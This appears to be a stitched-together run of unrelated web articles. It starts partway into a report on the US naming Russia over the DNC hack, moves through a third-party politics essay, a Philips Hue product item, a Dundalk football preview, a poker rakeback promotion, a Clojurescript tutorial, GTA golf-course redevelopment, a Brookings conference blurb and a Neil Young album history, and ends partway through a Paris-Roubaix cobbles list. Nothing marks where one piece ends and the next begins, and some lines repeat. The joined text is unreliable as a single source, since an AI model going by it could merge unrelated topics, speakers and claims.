The Obama administration noted that attempts to interfere in other countries' political processes are not new to Moscow. Russian hackers have used hacking and other techniques to influence public opinion in Europe and Eurasia, it noted. On the eve of a critical post-revolution presidential vote in Ukraine in 2014, for instance, a digital assault nearly crippled the website of the country's central election commission.
The intelligence community has for weeks been confident that hackers tied to Russian spy agencies were behind the DNC hack. Senior officials at the Justice Department and DHS pressed the White House to go public with an accusation.
But a number of administration officials were worried that such a statement would appear to politicize the issue in the weeks before the election. They were also concerned about the Kremlin's reaction and about inadvertently disclosing sensitive intelligence sources and methods.
“Is it in our interest to act?” Lisa O. Monaco, Obama's adviser on counterterrorism and homeland security, said at a Washington Post cybersecurity summit Thursday. “The primary guiding and overarching focus in these discussions is: What is in the national security interest of the United States? That's the North Star for those discussions.”
Senior administration officials in recent weeks had begun to hint that a public attribution might be coming.
“We know Russia is a bad actor in cyberspace, just as China has been, just as Iran has been,” ­Monaco said at a cybersecurity conference at the Center for Strategic and International Studies last month. “Nobody should think that there is a free pass when you're conducting malicious cyber-activity.”
Assistant Attorney General John Carlin said at the same event that the message to countries, such as Russia, that attempt to meddle in the U.S. election is, “You can and will be held accountable.”
With the public naming of Moscow, the administration has now officially called out all its major nation-state foes in cyberspace: China, Iran, North Korea and Russia. But among the four, Russia is the only government that has not been subject to a deterrent measure.
The administration has a range of options, including economic sanctions for malicious cyber-activity, a new tool created by the president that has yet to be used. The Justice Department could bring indictments for hacking. The National Security Agency could take a covert action in cyberspace to send a signal to the Kremlin. Or the State Department can decide to eject Russian diplomats.
Jason Healey, a senior research scholar on cyber-issues at Columbia University, said the Pentagon's Cyber Command should disrupt Russian hacking operations. “Go after their command and control,” he said. “ ‘Counteroffensive' is the key word here.”
Rep. Adam B. Schiff of California, the ranking Democrat on the House Intelligence Committee, urged the administration to work with European allies to develop a “concerted” response, whether it involves economic sanctions or other measures.
“The best way to push back,” Schiff said, “is in a truly international effort to let the Russians know there will be costs to this latest form of cyber-aggression against others.”
David Filipov contributed to this report.
Read more:
Justice Dept. official: U.S. gives ‘no free pass' to nations on cyberespionage
U.S. investigating potential covert Russian plan to disrupt November elections
Lawmakers think Obama should consider sanctions on Russia for hacking
PROGRESS: Hillary's Nomination Could Be the End of the Two-Party Duopoly in America
According to the media, Hillary Rodham Clinton has become the first female nominee of a major political party in the running to be President of the United States. This is a historic first for our country. In the spirit of this progress, it should also be the end of the two-party duopoly established by a bunch of dead white men over a hundred years ago.
Dustin Blocked Unblock Follow Jun 22, 2016 Unlisted
For over a century, political discourse in this country has been mostly limited to the fight between Democrats and Republicans, and it's become especially entrenched in the past few decades with the advent of the 24-hour news cycle and the button-pushing rhetoric we're bombarded with from the moment we wake up to the moment we go to bed. In the same way that “Kleenex” has become synonymous with facial tissue, the Democratic and Republican parties have gone overboard in tying their brands to everything that falls under the umbrellas of liberalism and conservatism.
Many of these hot-button issues are so intrinsic to people's identities and daily lives it's almost impossible not to take a side and pledge allegiance to one of the parties. Unfortunately for voters, these organizations have little to offer any more aside from a continuation of an elite corporate agenda that is not in the best interests of the American people. There are many more examples than this: but notice how every single Republican voted for Obama's TPP Fast-Track bill in spite of their longstanding history of opposing every word that comes out of his mouth. Notice how the warrantless NSA spying on American citizens started under Bush and actually became more unchecked under Obama. Notice the ever-increasing reach of the entire executive branch, regardless of which political ideology is allegedly sitting in the Oval Office. Publicly, Democrats and Republicans fight like cats and dogs, but there are a number of major issues they completely align on (like the TPP), and those issues are mysteriously absent from the discourse of mainstream news.
The intensity (and level of distraction) of the culture war between liberalism and conservatism is at an all-time high, while actual satisfaction with the Democrat and Republican parties is at an all-time low.
It seems that while they're busy fanning the flames of conflict between our citizens about how we're supposed to live our lives and what the definition of “right” and “wrong” is, they're actually doing very little to represent their constituents in the halls of our government. And everyone is noticing.
America is the largest democracy in the world, a melting pot literally defined by freedom, diversity and breadth of choice. Yet for the entire modern history of our nation, we have only been offered two real choices for President every four years. Especially in the last few decades, those offerings have become more and more divisive to our nation's people. And for the record, we're one of the few major democracies in the world to (dys)function like this.
Right now, the choice is allegedly between Hillary Clinton or Donald Trump, two of the most hated Presidential candidates in history, and the sheer hopelessness of that dichotomy is making people crazy.
Scarcity has a horrifying effect on people, and part of what we're witnessing with the increasingly extreme rhetoric of both sides of the culture war is the inevitable response to built up pressure with nowhere to go — a perfect reflection of the extreme confinement of choice forced upon our populace by habit, history and a corrupt political media. People are feeling hemmed in by the limited choices being forced upon them, and like passengers stuck on a sinking ship, understandably, our composure and class is falling on the wayside as we sink further and further below the water line.
However, unlike this sinking ship metaphor, the only thing creating this dichotomy between one or the other is the duopoly of the Democratic and Republican parties themselves, aided by the lazy, corrupt media that has absolutely no desire to legitimately inform viewers or help find solutions to our problems. The idea that we can only choose between a Democrat or Republican is an illusion propped up by money and history, and hypnotized into the public consciousness by the endless drone of media personalities overreacting to inevitable conflict. As the false dichotomy becomes more and more inescapable and suffocating, people are becoming more and more desperate.
And that includes Clinton and Trump themselves. Things have become so intense in our little “democratic” pressure cooker that the political landscape is currently undergoing a minor inversion. Conservative charlatan Trump is actively welcoming far-left Dems who are angered by the DNC's treatment of Bernie Sanders and his supporters. Hillary's success now heavily depends on recruiting disaffected Republicans with focus-group tailored rhetoric for conservative deserters who hate that Trump is leading their party.
The reason people are so belligerent and angry about politics these days is because they're “hangry” from a famine of real choice.
Americans have become so dissatisfied with the Democrat and Republican status-quo that registered independents now outnumber all of them. And between Hillary and Trump and masses of people on the red and blue teams who are fed up with the system, we might actually see all of this translate into a President who is neither Democrat nor Republican come November.
It's really simple: we need more than two parties. And there are plenty of options to choose from out there.
They just need to be taken seriously. Jill Stein of the Green Party is actively courting Bernie Sanders to join their ranks. There's the Libertarian Party. There's an Independent Party. There's also people who are more literally independent and not actually part of a party.
To the jaded Democrat readers afraid of another Ralph Nader, let me pre-emptively shut you down with this article.
The political duopoly doesn't just present of problem of choice. It's a considerable security issue as well. When power is as consolidated as it is between Democrats and Republicans, it would be very easy to corrupt with bribery. And that's exactly what's happening, according to Represent.Us, an organization devoted to campaign finance reform. In their most-viewed video, they explain the process by which monied interests “lobby” individual politicians for favorable legislation. What they don't mention is that multi-national corporations do the same thing with entire political parties. Actually, both political parties, at the same time.
Notice that while we celebrate victories and lick the wounds of defeat on hot-button social issues like equality and gun-control, the largest multi-national corporations in the world are always doing better and better, regardless of whose in the White House.
Congratulations America, you have proven that we have moved enough out of the dark ages of racism and sexism to be lead by an African American man for eight years, and that you're considering a woman to be his successor. But don't stop there. We need even MORE DIVERSITY and MORE PROGRESS. We have to transcend this two-party duopoly and actually have a real democracy instead of this Game of Thrones bullshit fed to us by the same media conglomerates whose shareholders own most of Washington.
European technology maker Philips will begin selling programmable home lighting systems exclusively through Apple stores starting Tuesday.
Hue is a series of light-emitting-diode bulbs controlled from a handheld Apple device through a household Wi-Fi network. At the Apple end, users can control the lights using a free app on their iPhone, iPod or iPad.
Philips's lighting system Hue, controllable through iPhones and iPads, goes on sale Tuesday in Apple stores. (Philips)
The bulbs offer a variable white light, mimic incandescent lights and will produce more than 16 million colours. While LED lighting has been praised for its extreme power-saving attributes, the harsh whiteness of the light has taken longer for technology to control.
"I was able to change the colours of the light bulbs in different rooms, adjust the brightness level or turn the lights off and on with one touch from my iPad," wrote Mashable reviewer Andrea Smith, who tested the system for several days.
As well, the system can memorize lighting combinations for people to reuse in the future and can operate on a timed on-off basis. Lighting combinations and programs can be shared through social media.
"I pressed a button on the bridge which immediately identifies all three lights," Smith wrote.
"Using the app on my iPad, I was able to rename the lights, calling them living room, family room and office. I had fun sliding the bar from left to right, which changes the intensity of the bulb's colour; it was like having a dimmer switch built into my mobile device."
The system offers flexibility and control that was once limited to lighting systems worth thousands of dollars in commercial applications.
For all that, however, it isn't cheap. The introductory kit — three bulbs and a ZigBee bridge that attaches to a Wi-Fi router — costs $199 in Canada. Additional bulbs cost $59 each. As many as 50 bulbs can be operated on one system.
In terms of power, the bulbs are rated at up to 8.5 watts, and each produces light of 600 lumens — roughly equivalent to a 50-watt incandescent bulb.
When Stephen Kenny looked around the Dundalk dressing-room after Monday's win in Longford, he had a bad feeling about tonight's Europa League date with Zenit St Petersburg.
When Stephen Kenny looked around the Dundalk dressing-room after Monday's win in Longford, he had a bad feeling about tonight's Europa League date with Zenit St Petersburg.
'There were a lot of injuries and fellas on benches all over the place' - Dundalk patching up walking wounded for Zenit test
"There were a lot of injuries and fellas on benches all over the place," he sighed. "And you're looking at it thinking 'Jesus, we're playing Zenit in two days. We're in trouble'."
It dampened the euphoria that came with going seven points clear at the top of the Premier Division but, in this specific instance, time really can be a healer, even if it's not as much time as Kenny would like.
"Our preparation couldn't be any worse in terms of doing nothing on the training ground. Nothing," admitted the Dundalk boss ahead of a light session at the match venue in Tallaght, "But as you get closer, your optimistic nature overrides that."
Still, this Dundalk group will have to cope with the aches and pains that have upped the gradient of a stiff task.
Skipper Stephen O'Donnell misses out and the doubtful Chris Shields sat out proceedings with a view to conserving his energy for a fifth outing in the space of just 12 days. John Mountney, Dave McMillan and Ronan Finn all have issues too.
Strongest
But Kenny has faith in his physios Fearghal Kerin and Sam Rice and believes that his players are capable of drawing energy from a full house and the challenge of taking on arguably the strongest side they have encountered on their European adventure.
"The bigger games do give you an added impetus," said centre-half Andy Boyle, who admits that it's easier to cope with the workload in his position than it is for the midfield runners.
"It takes its toll but just looking at the team we are playing will give us energy. It's something to look forward to rather than fear."
That summed up the tone of the messages from the Dundalk camp, with Kenny smiling as he detailed that tactical discussions with the group at a Tuesday night video session revolved around avoiding falling into a 'low block' - a phrase that has come into fashion.
"A lot of the teams are playing that at the moment but we're not," he said, "It's basically the back four with the two wide players doubling up as full backs and the three in front of that. A 6-3-1. Teams force you to play that way."
He was referring to Zenit's established strategy of operating with three narrow forwards and two full-backs bombing on for width. Essentially, the team under pressure has no option but to fall back into that shape. Dundalk's mission will be to dodge that fate.
"We want to play our natural way," said Kenny, "Our success has been based on greater ambition than that, and we have to keep that ambition or we'll lose. If you play that way there's an inevitability about that. It becomes a matter of time."
Kenny's squad are fully briefed on Zenit's quality: a squad packed with internationals, with Boyle acknowledging that the Irish champions' strength on the counter will have to be utilised.
They were already familiar with the leading lights, specifically Axel Witsel, who scored for Belgium against Ireland in the Euros and was unable to complete a £25m move to Juventus before the close of the transfer window.
He provides a midfield base next to ex-Man City man Javi Garcia in a team which has an extremely attacking mindset. They are unbeaten in all competitions this term and have scored 29 goals in their last eight matches.
The main glimmer of hope is provided by the fact they shipped three away to Maccabi Tel Aviv in their Europa League opener - even though they came to score four and win the game.
"They conceded two headed goals with runners from midfield," said Boyle. "That's interesting."
Zenit arrived in Ireland on Tuesday and did a small tour of Dublin yesterday, and the opening gambit from a visiting hack at the press conference was about Guinness.
They did exude confidence in a slightly confused event where a translated answer from player Artyom Dzyuba talked of Dundalk's long passes and comments from Romanian coach Mircea Lucescu discussed short passes.
Both referred to a 'British style' and Dundalk will be hoping they are underestimated. Lucescu did compliment their previous European displays, but was firm on the bottom line for a club with a €165m budget.
"They deserve to be here," he said, "But I expect to win, it's normal."
Zenit are in a strong position after crushing AZ Alkmaar 5-0, with the Dutchmen taking the brave but ultimately crazy decision to start with two up front. Kenny will not be doing that.
It is likely that his team's qualification prospects will be determined by matches with AZ and Maccabi, yet it's not in his make-up to simply write a game off, and he confirmed that nobody will be rested with Bohemians on Sunday in mind.
That said, he is reluctant to take any gambles that may lead to early substitutions. He knows every player is desperate to be involved because these could be the best days of their lives.
He has received text messages from Derry players involved in their European run under his watch ten years ago which essentially made that point.
"You don't know how things will go in your life so I do think that this is a period that the players should really embrace," he asserted.
"It doesn't mean it's all or nothing. We still have to go in the next few years and build. But while we're here, you have to be the best you can be. This is a great event in people's lives. We have to relish this and enjoy it."
Irish Independent
The fastest growing network since Black Friday, the Merge Network has leaked today that they will be ending their rakeback program starting the 1st of June. The Merge Network includes popular rooms like RPM Poker and Carbon Poker.
UPDATE: Merge has announced that existing Rakeback players and new players who sign up for rakeback before June 1st will be grandfathered in.
Merge has confirmed the changes with us but also stresses that more detailed information at this point is simply speculation. This seemingly simple change touches many aspects of their business and leaves many open questions:
How will existing rakeback players be handled? Will they lose rakeback on their existing Merge rakeback account or will they retain their 35% rakeback rate? Will they be grandfathered in to a higher tier of the VIP program if their rakeback is no longer being offered?
To what extent will the rapid growth Merge is experiencing slow down and allow an opening for Cake, Yatahay and Everleaf to gain traction?
How will affiliates be effected? Will Merge rooms continue to dominate the space on rakeback websites? Will Race and Chases continue to run through major rakeback affilaites (like PTP Rakeback)? How similar will promotional value be between skins moving forward?
Will this open the door to underground rakeback offers that many dub as parasites of the poker ecology? What will Merge do to control this demon?
To be fair, Merge has not intentionally released this information to the public. It was leaked before they had the opportunity to fine tune their plans. For years Merge rooms have offered outstanding player value on thin margins and it's only reasonable for them to seek larger margins after the events of Black Friday.
What Should You Do?
While it isn't known if players signing up before June 1st will be grandfathered in to their agreements, it is very likely that they will receive some preferential treatment. PTP Rakeback offers the best value anywhere on Merge at both Carbon Poker and RPM Poker:
RPM Poker
35% rakeback paid daily
$25,000 Monthly Rake Chase
100% Deposit Bonus up to $1,000
6.5% VIP Cash Back
Mo' Moneuy Mo' Promos in May
Carbon Poker
35% rakeback paid daily
$10.000 Monthly Personal Rake Chase
200% up to $2,000 Deposit Bonus
High Value VIP program
Free Training from Drag The Bar
Super Money Tree and other monthly promotions
More news on this story as it develops, or contact our rakeback staff if you have questions about your specific situation.
First steps with Clojurescript
Dario Ghilardi Blocked Unblock Follow Feb 23, 2016
If you are not familiar with the concepts in the first paragraphs, I highly recommend you to read all the linked pages. Depending on your background you may realise that understanding some concepts takes time. Don't discourage yourself! The journey to master this concepts is long, but I think it professionally pays with interests.
I started using Clojurescript a while ago and I was not experienced with Clojure at all, I was able to learn enough Clojure to start playing with the code thanks to 4clojure and some other online resources.
I soon realised that at the beginning I spent quite a lot of time dealing with the language tools and trying to find my way through the ecosystem. I was afraid other people would do the same, so I decided to write this post that describes some of the things you need to know to start a new Clojurescript project from scratch, hopefully saving you some time.
Beware that this is an opinionated post, don't get angry if I don't suggest the same tools you're using, this is what worked for me.
Let's start.
1- Use a community supported editor
The first decision to take might look trivial, of course you need an editor to write Clojurescript code. Turns out this is an important decision for two main reasons:
as you might know, Clojure is a lisp. Its syntax requires you to write a lot of parentheses and an editor with specific plugins will help you a lot.
Clojure and Clojurescript both provide interactive development through the REPL, which is simply amazing. At the beginning you might not know what this REPL is about, but I'll tell you, you want to use a REPL integrated editor.
Now, according to the 2015 state of clojure the most used editors for Clojure are:
Emacs + CIDER
IntelliJ + Cursive
Vim + Fireplace
As a long-time Vim user the first combo I tried was obviously Vim + Fireplace, which works fine. Later on I decided to invest some time and switch to Emacs, but I don't consider it necessary and trust me, you don't want to do that while learning a new language.
If you are an IDE type of guy you will certainly appreciate Cursive, a plugin for Intellij specific for Clojure and Clojurescript. I watched a talk about it and it looks amazing.
A small percentage of users are using LightTable or Sublime Text. It's possible, but it's less used and therefore less supported by the community.
My suggestion is to use one of the three editors above, you'll find amazing community support and I can ensure you'll be immediately productive.
2- Choose a build tool
If you created a Clojure project in the past, you'll certainly be heard of Leiningen, which is by far the most popular build tool for Clojure and Clojurescript projects. You will use it for example to fetch dependencies, to build and run your project, to execute tests.
But Leiningen is not the only build tool available for Clojure and Clojurescript projects, there's a relatively new kid in town these days called boot.
Here is a list of the things I think you need to know before starting your first Clojurescript project:
Leiningen is declarative and almost all the configuration happens inside a big project map that you keep at the root of your project, in a file called project.clj . With Leiningen you can use Figwheel, which is a popular library for reloading and evaluating your code in the browser, dramatically improving the feedback loop (watch this awesome talk).
Boot instead rely on a more programmatic approach. Defining a simple build.boot file at the root of your project, you can customise multiple set of tasks in a developer friendly way, it's just Clojure code. If you want to reload capabilities of Figwheel, you can include in your project the boot-reload library, which does more or less the same job.
Both build tools are documented pretty well and I suggest you to discover their internals.
I personally don't like the big project map you need to use when configuring a project with Leiningen. Here is an example taken from one of my projects:
Compare it with a build.boot file:
Even if you don't know anything about boot, try to guess what the boot dev command will do. Isn't it simpler and self-explanatory compared to the Leiningen project map?
I believe it is, that's why I suggest you to use boot for your first project.
Now, I omitted on purpose a lot of important differences between Leiningen and boot in this section, because the first thing I saw as a beginner was this configuration and I think you'll do the same. If you want to understand more, the boot wiki is a great starting point.
In some communities the build tool is an obvious choice (the majority of the people in the Ruby community for example use Rake), in the Clojure community you have the freedom to choose.
Other people might suggest you to use Leiningen, it's fine, but the rest of the post is in line with my choice of using boot.
3- Pick a project template
To create a Clojure or Clojurescript project you can start from scratch, or you can create a new project using an existing template. This is somewhat similar to the creation of a new Rails project, which in turn gives you some features out-of-the-box, for example sass and coffeescript support.
Tenzing is a simple and well documented template for Clojurescript boot projects. It optionally lets you include some features during the creation of the project, for example sass or less compilation, a React wrapper (Reagent or Om), a test runner.
Tenzing generates for you a nice build.boot file ready to be run, that you can then configure in the future.
I really suggest you to create your first project using the Tenzing template, you'll save some manual configuration.
If you didn't follow my advice when I recommended boot in step 2, you can use a template for Leiningen. There are two popular templates I want to suggest:
Both Om and Reagent are excellent interfaces to React.
4- Configure your editor for the REPL
The last step before actually start coding consists in configuring your editor to use the REPL. You need to do this if you want to be able to select a piece of code in your editor, press a keystroke and have it automatically evaluated, in the editor or in the browser connected via websockets.
When I was using Vim on a Leiningen project I really lost a lot of time with this configuration, it's not complex but I couldn't find my way through vim-fireplace, figwheel, piggieback and friends, and it seems I was not the only one experiencing the pain.
I ended up creating a new tmux window with the active REPL and sending commands to that window using tslime, a Vim plugin that pushes an highlighted piece of code from a window to another. It works, it doesn't evaluate code inside the editor but the outcome is pretty close.
Using boot and the corresponding boot-reload library instead of Figwheel I was able to configure Vim to send commands directly from the editor to the REPL and the browser. The configuration is simple and involves the steps described into the boot-cljs-repl README.
If you are using Emacs + CIDER the README of the project explains exactly what you have to do to connect your editor using to the REPL. Here is the section about boot projects.
5- Start coding
If you are reading this and you didn't cheat reading from the bottom to the top of this post well, congratulations! You should now have a working Clojurescript application with REPL evaluation and reload on code changes.
It's time to start coding, have fun!
Even on a cloudy day, the view from Katie Trusler's kitchen table is the perfect vantage point for the golf course that once backed onto her house. It has been two years since the historic Highland Gate golf course in Aurora booked its last tee time, but the view is still picturesque: an endless field surrounded by towering trees atop gently rolling hills.
Aurora resident Katie Trusler moved to her home in part because it backed onto a golf course. “We will be looking at a cul-de-sac behind our house now,” she says. ( Chris So / Toronto Star )
Trusler doesn't shy from saying it was this view that brought her family from Toronto to Aurora a decade ago. And it was this view that she recalls on the cold and wet day she moved in, feeling like she was “finally home.” And now, when it comes down to it, it's this view she will miss the most. “We will be looking at a cul-de-sac behind our house now,” said Trusler, pointing to a street on a marked-up development plan for a 184-house subdivision planned for the property by Geranium Homes and ClubLink corporation. “Nobody is against development, but to squeeze so many homes on such little land is insane.”
Article Continued Below
For years, golf courses were seen as an assurance that there would always be green space nearby. And many residents say they paid a premium to have their home back onto pristine green space, even at the risk of the odd golf ball hitting their window. But in recent years, the city's hot housing market — and a downswing in the number of new golfers — has turned sprawling GTA golf courses into lucrative real estate investments. World-renowned Glen Abbey in Oakville and Copper Creek in Vaughan are among a half-dozen other GTA courses that have recently confirmed plans to eventually replace their fairways with subdivisions. “If you are owner of a piece of property . . . it's just become so valuable that you can make so much money off it by selling it for real estate than you can operating a golf course,” said Scott Simmons, CEO of Golf Canada. “And because there are so many courses in the GTA, people will simply find another place to play.” But municipalities say the trend is troubling for a host of reasons: firstly, the extensive development plans for those properties are not on par with local official plans; secondly, they take away much needed green space; and the complexity of the projects is forcing the matter to the Ontario Municipal Board, where the outcome is uncertain. “Cities all across the GTA are being confronted by developers who bought up golf courses and are trying to change them from being designated as private green space and convert them into massive residential developments,” said Oakville Mayor Rob Burton. “It totally disrupts orderly development of the GTA and local official plans . . . by putting masses of people where they aren't planned for.”
The Glen Abbey development, owned by ClubLink, calls for the construction of more than 3,000 homes, offices and retail. Rai Sahi, CEO and chair of ClubLink, which owns courses in Ontario, Quebec and the U.S., said much of it comes down to simple economics.
Article Continued Below
“The golf course business is getting challenging. Firstly, courses are open only half the year,” he said. “Truthfully, as a businessman if there was an opportunity to develop golf course into residential . . . it's a better deal to build.” Sahi added that he has no further plans to redevelop his properties. He said Glen Abbey will remain open for the next few years.
Rai Sahi, CEO of ClubLink Corporation
But Burton is calling on the province to intervene. Burton said the premier must “protect the integrity of her provincial growth plan,” which set population and growth targets that many municipalities say they have already met. He's not the only one taking aim at the province. Upset politicians from 40 municipalities in Ontario are planning to attend a summit in May to discuss the issue, said Aurora Councillor Tom Mrakas, who spearheaded the event. “The OMB process is unfair to municipalities, at the end of the day, and that's why the summit is getting so much traction,” Mrakas said. The event, he adds, has morphed into an OMB reform summit, since the two issues are inextricably linked. He says the goal of the summit is to present a co-ordinated voice to the province asking for “meaningful reform.” A spokesman for the Ministry of Municipal Affairs and Housing said the province hopes to launch a review of the OMB this spring. “The government continues to see a need for an independent appeal body that can hear planning matters that are often complex, in order to protect long-term public interests,” a ministry spokesman said. “At the same time, we recognize the need for continuous improvement to the land-use planning and appeal system.” Golfing golfing gone If the last few years are any indication, golf courses are not just venues for perfecting your short game. All across the GTA, they have become prime real estate investments too. Here's a snapshot of GTA golf courses that have plans for development. Glen Abbey
View from the 11th tee at Glen Abbey Golf Course.
In November 2015, the owner of this prestigious course announced plans to pave over fairways to build a subdivision with 3,000 homes, retail and office space. ClubLink Corp., which owns dozens of golf courses in North America, bought the 93-hectare course for $40 million in 1998. The town of Oakville implemented an interim control bylaw in February to study the impact of the proposal. In the meantime, the club says “it's business as usual,” and plans are in place to host the Canadian Open there this year. Highland Gate In November 2014, the historic Highland Gate Golf Club, dating back to the 1930s, hosted its last round. The developer, ClubLink, announced its intention to develop the 41-hectare parcel of land into 180 or so homes and a condo building, citing an “oversupplied local market.” Earlier this year, after a number of heated public hearings, the proposal is now in front of the Ontario Municipal Board. Saw-Whet
Golfers take advantage of an early start to the season at Saw-Whet golf course off Bronte Road in Oakville. ( ANDREW FRANCIS WALLACE )
A plan to develop on the golf course came before the Town of Oakville in March 2014. When the town didn't approve the plan in the 180 days required under the provincial planning act, developer Bronte Green Corporation appealed to the Ontario Municipal Board. The proposal includes 760 residences on 55 hectares. The matter is still in before the OMB and is expected to continue to the end of the year. Mandarin
Alvin Yeung with caddy at Mandarin Golf and Country Club Golf. ( Vince Talotta )
The private 18-hole club on a 56-acre property in Markham accepted a $22 million offer from Fieldgate Developments in 2013. The sale became official in 2014, but the club entered into a ground lease to continue to use the golf course and facilities for up to three years. It's not clear when that lease runs out. York Downs
Meghan McDougal of York Downs Golf and Country Club. ( David Cooper )
In the summer 2015, the majority of members of the York Downs Golf & Country Club in Markham voted to sell the 167-hectare facility to a consortium of developers for $412 million. According to a newsletter released in the fall by developer Kylemore Communities, 32 hectares of land that are unimpeded by the golf course will become the first phase of development. The club is expected to operate for another five to six years. Copper Creek One of Vaughan's best 18-hole golf courses, which opened in 2002, could be half the size if the developer's plan for the Kleinburg property is approved. In early 2015, developers Fieldgate Homes and TACC Construction, presented the city of Vaughan a preliminary plan for up to 800 homes, townhomes, low-rise and condos for half the site. A nine-hole golf course would remain, in part, because the fairways sit on the protected Greenbelt.
Read more about:
On March 14 to 15, the Center for Middle East Policy at the Brookings Institution and the United States Central Command jointly convened for their annual conference on the Middle East. This year's conference, “The Middle East 2017,” covered a range of issues relating to both near-term events and long-term trends in the region and for U.S. policy. Over the two days of discussion, the participants focused on the civil wars in Iraq, Syria, and Yemen that are fueling extremism, humanitarian crises, rising sectarianism, and the collapse of socio-political systems, as well as the likely courses of action for the critical competing regional and great powers, including Saudi Arabia, Iran, and Russia. The conference explored how best the United States can safeguard its interests and its allies in the face of these many challenges in the region.
Author Kenneth M Pollack Former Brookings Expert Resident Scholar - AEI
The conference featured a range of experts from the United States government and military, academia, think tanks, and the region. The center was honored that General Joseph Votel, Commanding General, United States Central Command, was able to attend and participate for some of the conference. Together, the speakers and conference participants offered insights that went well beyond conventional Washington wisdom, peered into the future, and provided valuable lessons and ideas for the U.S. military and the broader policy community.
In the mid-'70s, Neil Young couldn't decide what to do. He'd record a full album, plan to release it and – at the last minute – shelve it in favor of something totally different (which is what happened in 1975 with the aborted Homegrown , which gave way to Tonight's the Night ). These were years of hard drinking, hard living and, apparently, hard decisions. In late 1976, he made another hard decision.
While hanging out with Cameron Crowe, who was with Neil to write a Rolling Stone profile, Young abruptly changed his mind about Decade , a three-LP retrospective of his career, which also included some new material. Some 300,000 copies of the compilation were being pressed when Young began to have second thoughts.
“What if I just save Decade for a year, then put out a new album?” Young asked Crowe. “The new stuff sounds so good – I've got this song called ‘Hurricane' that just soars – I think I'd feel better releasing something new. It's not time to look back yet.”
Before long, record label head honchos were meeting with Neil at a tour stop to discuss delaying – but not ditching – Decade . He played Warner Bros. President Mo Ostin and Executive Vice President Ed Rosenblatt the album he wanted to put out first: something he was calling American Stars 'n Bars . He explained the title in the pages of Rolling Stone .
“One side is about American folk heroes and the other is about getting loose in bars,” Young revealed. Ostin and Rosenblatt granted the singer-guitarist's wish to first focus on a new LP of original material.
But the material that the guys from Warner Bros. heard wasn't exactly what ended up on the final version of American Stars 'n Bars . In the run-up to releasing the album in the spring of 1977, Young changed course yet again, removing songs such as “Powderfinger,” “Captain Kennedy” and “Sedan Delivery” from the record. (Instead, he offered them to Lynyrd Skynyrd , but that's another story.)
Listen to "Saddle Up the Palomino"
In place of those tunes, he quickly recorded a batch of new songs with Crazy Horse in April at his ranch in La Honda, California. Young was in a country mood at the time, which showed on twangy, shuffling songs like “Hey Babe” and “Saddle Up the Palomino.” Adding some extra country flavor was Ben Keith with his pedal steel, as well as backing vocalists Linda Ronstadt and Nicolette Larson. Ronstadt would later recall being tricked into delivering a more rustic performance.
“Neil and his band were in an old barn and it was set up like a live gig with a P.A. and vocal monitors,” she recalled, via engineer Richard Bosworth in Neil Young: Heart of Gold . When the day was over, Ronstadt commented on how good the songs sounded and that she looked forward to recording them. “Neil took us out back of the barn and there was a remote recording truck that unbeknownst to us had been recording us all day. And Neil said we were done.”
But the five songs that came from those sessions only made up Side One of American Stars 'N Bars . For the second half of the album, Young decided to release some songs that had been kicking around a while. “Star of Bethlehem” – featuring Emmylou Harris – originated in the Harvest days, then was set for Homegrown , then Chrome Dreams , both of which went unreleased. “Homegrown,” obviously, dated from its namesake LP, while “Hold Back the Tears” (on Side One) and “Will to Love” could have seen release on Chrome Dreams . The same goes for the song Young mentioned as the impetus for releasing American Stars 'n Bars : “Like a Hurricane.”
Listen to "Like a Hurricane"
This most epic of Young's recorded works had its origins in the summer of '75, when the musician was recovering from throat surgery and couldn't talk or sing. According to Jimmy McDonough's biography, Shakey , the song's key line was inspired by an attractive woman that Neil saw when he was drinking with his buddies: “ You are like a hurricane / There's calm in your eye .”
“As was our habit between bars, we had stopped at Skeggs Point scenic lookout on Skyline Boulevard up on the mountain to do a few lines of coke,” Young said in his book, Waging Heavy Peace . “I wrote ‘Hurricane' right there. ... Then when I got home, I played the chords on this old Univox Stringman mounted in an old ornate pump-organ body set up in the living room. I played that damn thing through the night. I finished the melody in five minutes, but I was so jacked I couldn't stop playing.”
“Like a Hurricane” turned into a swirling, “Runaway”-referencing epic when Young recorded the song with Crazy Horse in November '75. He took a different approach to another very long song, “Will to Love,” in which Young imagines himself as a salmon swimming upstream. The seven-minute track is a home recording of Neil playing acoustic guitar in front of his fireplace (which you can occasionally hear crackling). It's a dreamy, meandering song – with overdubbed vibes and drums from also by Neil – which Young has never performed, because he doesn't recall the intricacies of the vocal melodies. It remains a divisive song among fans and critics, although Young has said it “might be one of the best records I ever made.”
Listen to "Will to Love"
With its country-rock first side and its hodgepodge second side, American Stars 'n Bars came out on May 27, 1977 – becoming Young's eighth full-length studio LP to see release. Actor – and Young pal – Dean Stockwell created the album cover, referencing the “Bars” portion of the record with Neil's face smashed against the floor of a tavern, seemingly on the verge of passing out.
Fans seemed to like it about as much as any of Neil's post- Harvest releases as the LP made a respectable showing on the charts in many countries, going silver in the U.K. and gold in the U.S. (just like the last three albums). Reviewers were kind, if restrained, in their appreciation of American Stars 'n Bars , mostly focusing on the power of “Like a Hurricane.” And when Decade finally appeared in the fall of 1977, “Like a Hurricane” joined the tracklist.
Here ya go -- Paris-Roubaix, secteur-by-secteur. Apart from the most famous stretches the cobbles of Paris-Roubaix aren't as well-known as the hellingen of Flanders... if only because we see them once a year, maybe twice. So let's take a look at each one. And I do mean look, where possible. I thought it would be fun to actually see some of the cobbled secteurs and get a feel for how they are unique (or not). Thanks to Les Amis, there are a number of pictures out there available for use showing the cobbles in various key locations. And if you look at them side-by-side, you can start to notice some of the finer points as to what those stars mean. [And if you didn't know, ASO scores the difficulty of each secteur with one (easy) to five (hell) stars.
[Update] Carrefour de l'Arbe picture fixed. Check it out, it's so nasty.
27. Troisvilles (km 98 - 2200 m) ***
Downhill on the cobbles... this is a good way to get out your early terrors. Said to be in good shape.
26. Viesly (km 104.5 to 1800 m) ***
Straight and generally lacking in surprises.
25. Quievy (km 107 to 3700 m) ****
They're not big bruisers. On the other hand, 3700 meters is forever, and there's a long, slow uphill drag. Also, I bet these stones get pretty slick on a wet day:
24. Saint-Python (km 115.5 to 1500 m) **
Unless the internet is lying to me, there is no actual St. Python. Too bad; I was never all that inspired by the stories of the saints. Maybe if one of them had been named after a deadly snake or a troupe of British comedy geniuses, I would have paid more attention. Anyway, these 1500 meters are still just preamble.
23. Vertain (km 119.5 to 2300 m) ***
No doubt the distance is the issue. Also, at this point the cobbled secteurs are starting to feel a bit relentless, you'd think. This secteur makes it 9.3km of stones from km 104 to 121.
22. Capelle-sur-Ecaillon - Le Buat (km 126.5 to 1700 m) ***
